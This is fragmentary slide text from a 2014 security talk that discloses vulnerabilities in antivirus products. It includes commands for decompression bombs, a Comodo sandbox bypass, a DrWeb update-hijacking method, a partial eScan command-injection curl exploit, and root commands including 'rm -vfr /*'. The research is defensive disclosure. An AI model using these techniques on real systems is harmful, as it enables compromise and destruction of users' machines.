«Breaking Antivirus Software Joxean Koret, COSEINC 44CON, 2014 Breaking antivirus software Introduction Attacking antivirus engines Finding ...»
Available for your exploiting pleasure at the fixed addresses 0x10000000 in x86 and 0x18000000000 in AMD64.
Comodo Internet Security It actually means Comodo Internet Security users are actually vulnerable to Exploitation.
Koret is correct and your product sucks hard. Thanks for playing!
AV developers writing security software Remote Denial of Service Examples: ClamAV DOS There was a bug in ClamAV scanning icon resource
Found via dumb ass fuzzing.
Reported. Because it's Open Source...
https://bugzilla.clamav.net/show_bug.cgi?id=10650 The vulnerability was nicely handled by the ClamAV team (now Cisco).
Decompression bombs (multiple AVs) Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001.
A compressed file with many compressed files
* Sophos finishes after ~30 seconds. In a “testing” machine with 16 logical CPUs and 32 GB of RAM.
** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one.
*** In my latest testing, ESET finishes after 1 minute with each file in my “small testing Machine”.
**** Sometimes, it seems to time-out after 5 minutes on Windows.
Decompression bombs: How to To create a simple decompression bomb in
Unix issue the following commands:
$ truncate -s 8589934592 dumb # 8GB $ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb That's all. The result file is always less than 10 MB.
I couldn't believe that still nowadays antivirus engines failed at this trivial “attack” when I “discovered” this...
Notes about decompression bombs These bugs are not a big deal. I know.
However, they can be used like in the following
It seems nobody cares about this bug.
Also, some companies are really funny:
http://www.cio.co.nz/article/551276/antivirus_products_riddled_security_flaws_researcher_says/ BitDefender engine BitDefender is a Romanian antivirus engine.
Their AV core is the most widely distributed AV
LavaSoft, Immunet, QiHoo 360,...
It suffers from a number of vulnerabilities like almost all other AV engines/products out there.
Finding vulnerabilities in this engine is trivial.
(Vulnerability fixed) Modifying 2 DWORDs in a PE file
packed with Shrinker3 packer used to crash it:
Those bytes were used to calculate the file and sections alignment of the new, in memory, unpacked PE file.
When set to 0xFFFFFFFF and 0xFFFFFFF, both file and sections alignment were set to 0...
BitDefender bugs...and their values were used, later on, in some
Those 2 bugs were trivial to discover. But they failed to find them by themselves...
One more complex BitDefender bug...
(Vulnerability fixed?) Modifying a single byte in a
Thinstall installer would make it to crash:
After modifying one byte, the decompressed content would get corrupt. And index to a table was calculated with the corrupted content... and data likely controlled by the attacker was copied to a position also likely controllable.
Again: this bug was trivial to discover. TRIVIAL.
BitDefender notes This and all BitDefender's bugs don't affect exclusively BitDefender's products.
It affects many AV products out there as previously mentioned.
Adding a new AV engine to your product may sound “cool” but you're making 3rd party bugs yours.
And, by the way, you didn't audit it before
ESET Nod32 is a well known Slovak AV engine.
Like many other AV engines, it suffers from a number of vulnerabilities that can be trivially discovered.
One little example: a malformed PDF file.
They talk in their blog post (http://x90.es/comodofail) about their sandboxed processes.
They only sandbox processes in Windows, not in Unix.
most AV products out there, no matter what they say.
Comodo example vulnerability I have ~9 bugs in their parsers discovered with my fuzzers (1 instance, 1 week).
Almost any malformed OLE2 container (i.e., a word document) can make it to crash.
Let's see an example bug:
Very hard, isn't it?
BTW, remember: the AV scanning processes doesn't run sandboxed in Linux.
“Security enhanced” software Security “enhanced” software Some AV suites comes with various other software programs that are installed by default.
The most typical examples:
Rising is an anti-virus company from China.
Summary: no ASLR enabled library at all.
Also, the AV product installs one “security enhanced”
Everything runs with “Medium” integrity level and there are 6 libraries without ASLR enabled.
Isn't it cool?
Advice to users of this Rising installed browser:
DO NOT USE THIS BROWSER.
Security enhanced products...
But, as is common with AV suites, this is not
Kingsoft distributes with the AV installer one “security enhanced browser” called Liebao, cheetah in Chinese.
It's installed by default with the AV.
Also, set as the default browser.
This browser is exploiter's heaven and they fail
...or the lack thereof. Proof:
For users of Liebao: DO NOT USE IT.
More AV developers writing security software Extra about Kingsoft Also, they install one ad-ware. Yes, your AV product. It's called NaviNow.
It's from a Japanese company with the same name.
Nevertheless, an AV product is installing, for you, an ad-ware. Very cool...
My Sandbox is Unbreakable (TM) Talking about sandboxes...
Some AV products, like BKAV or Comodo Internet Security, as we have seen previously, are good targets for writing targeted exploits against their users because they install a library without ASLR system wide.
But, what is this library for?
Let's take a closer look to one sandbox...
Or something similar, they said...
Comodo Internet Security Kevin J. Judge, in the Comodo's blog post, used my research to promote their product, as previously
mentioned... didn't I? :)
He talks a lot about the sandbox of the product and the protection it gives and bla, bla, bla...
I did check the HIPS and the true sandbox, partially, they use to run untrusted applications.
The HIPS for ~2 hours (considering the installation
Let's see the results...
HIPS/sandbox bypass demo Let's see the black magic behind this...
But, be warned!
You have been warned...
Comodo Internet Security's HIPS Their sandbox (partially) and HIPS system (completely) are implemented as user-land libraries (BTW, without
ASLR, the HIPS one) injected system wide:
Guard32/64.dll for the HIPS. Cmdvirt32/64.dll for Sandbox.
The libraries simply hooks some user-land functions like:
CreateFile, CreateProcess, etc... using madCodeHook (a genuine work of non Comodo people).
It was a good enough technology 10 years ago.
I wonder if they patented user-land hooks. Just curious...
The obvious attack:
Call FreeLibrary(GetModuleHandle(“guard32.dll”)) from inside the monitored process.
Comodo Internet Security's Sandbox On the 1st try I received the error 5, “Access denied”.
Then, I decided to attach a debugger and see what happens.
They are also hooking ntdll!LdrUnloadDll. From the very same library. That's all.
Final try: change page protections of ntdll, patch the function LdrUnloadDll so the hook is removed, reset page privileges and call FreeLibrary.
Guess what? It works.
Comodo Internet Security I only bypassed, yet, the “Partially limited”, “Limited” and “Restricted levels” of the HIPS (according to the GUI this is part of the sandbox but is not... anyway).
It took me 1 hour.
DrWeb is a russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex) + the Duma, to name a few customers.
More of their propaganda (the original web page I got this information from is inaccessible since I disclosed just 1 vulnerability during
SyScan 2014 Singapore):
DrWeb updating protocol DrWeb used (still does it?) to update via HTTP only. They do not use SSL/TLS.
It used to download a catalog file first:
was signed, even the DrWeb32.dll library.
DrWeb updating protocol The “highest grade of certificate from the government” used to require the highest grade of checking for their virus database files and antivirus libraries: CRC32. Lol.
To exploit in a LAN intercepting these domains was enough:
...and replacing drweb32.dll with your “modified” (lzma'ed) version.
DrWeb updating protocol Exploiting it was rather easy with ettercap and a quick Python web server + Unix lzma tool.
You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file.
I tested the bug under Linux: full code execution is
One Russian guy wrote a Metasploit exploit for
http://habrahabr.ru/post/220113/ In my opinion, this updating protocol (is?) was horrible.
DrWeb updating protocol vulnerability The vulnerability was fixed and “an alert” issued.
In the “alert” they do not say they fixed a vulnerability.
and, I think, Chinese.
They only said that changes were made to increase the security of the update procedure.
Technically true: From no security to some security.
I did not research the update. It can be fun as I'm 99%
that the eScan product have a Linux version.
I downloaded and installed it (~1 hour because of the awful hotel's connection).
Then I started checking what it installs, finding for SUID binaries, etc...
They use BitDefender and ClamAV engines, they don't have
mwconf (created during installation).
The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE... It was fixed recently.
A command injection in the login form (PHP).
what not to do or how to write easy exploits, as a tutorial.
The user name and the password were used to construct an operating system command executed via the PHP's function “exec”.
I was not able to inject in the user name.
Source code of login.php (I) Source code of login.php (II) The password sent to the user was passed to
There were some very basic checks against the
But they forgot various other characters like ';'.
Source code of common_functions.php Then, the given password was used in the
My super-ultra-very-txupi-complex exploit for it:
$ xhost + $ export TARGET=http://target:10080 $ curl --data "firstname.lastname@example.org&pass=1234567;
Once you're in, run this to escalate privileges:
$ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm Or anything else you want...
$ /opt/MicroWorld/sbin/runasroot rm -vfr /* Breaking antivirus software Introduction Attacking antivirus engines Finding vulnerabilities Exploiting antivirus engines Antivirus vulnerabilities Conclusions
...make you more vulnerable to skilled attackers.
...are as vulnerable to attacks as any other application.
Some AV software...
...may lower your operating system protections.
...are plagued of both local and remote vulnerabilities.
Some AV companies...
...don't give a fuck about security in their products.
Breaking antivirus software Introduction Attacking antivirus engines Finding vulnerabilities Exploiting antivirus engines Antivirus vulnerabilities Conclusions Recommendations Recommendations for AV users Do not blindly trust your AV product.
Isolate the machines with AV engines used for gateways, network inspection, etc...
Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.
Recommendations for AV companies Audit your products: source code reviews & fuzzing.
Internal code audits are good. 3rd party ones are awesome.
Do not use the highest privileges possible for scanning network packets, files, etc...
You don't need to be root/system to scan a network packet
privileged or sandboxed, process.
Recommendations for AV companies Run dangerous code under an emulator, vm or, at the very least, in a sandbox. I only know 3 AVs using this approach.
The file parsers written in C/C++ code are very dangerous.
I'm talking about your AV's running processes.
Recommendations for AV companies Do not use plain HTTP for updating your
...and verify there is nothing else after the signature.
Also, verify the whole certification chain...
Recommendations for AV companies Drop old code that is of no use today or make this code not available by default.
Code for MS-DOS era viruses, packers, protectors,
unsupported products nowadays.
Such old code not touched in years is likely to have vulnerabilities.
Ignore any antivirus comparative company asking you to detect malwares from the Jurassic era. Avoid them.
Special for Comodo and some other AV(s)...
Recommendations for AV companies This research is not meant to instruct users to not install AV products.
This research is meant to highlight the typical problems in AV products and push the industry to actually write secure security software.
Reporting bugs responsibly would not make
Then see the dates and what changed.
Recommendations for AV companies Also, do not write blog posts demonizing researchers or manipulating their words in order to promote your products.
Just a friendly recommendation.
Also, never say anything that can be understood as “Hackers can't own my product”.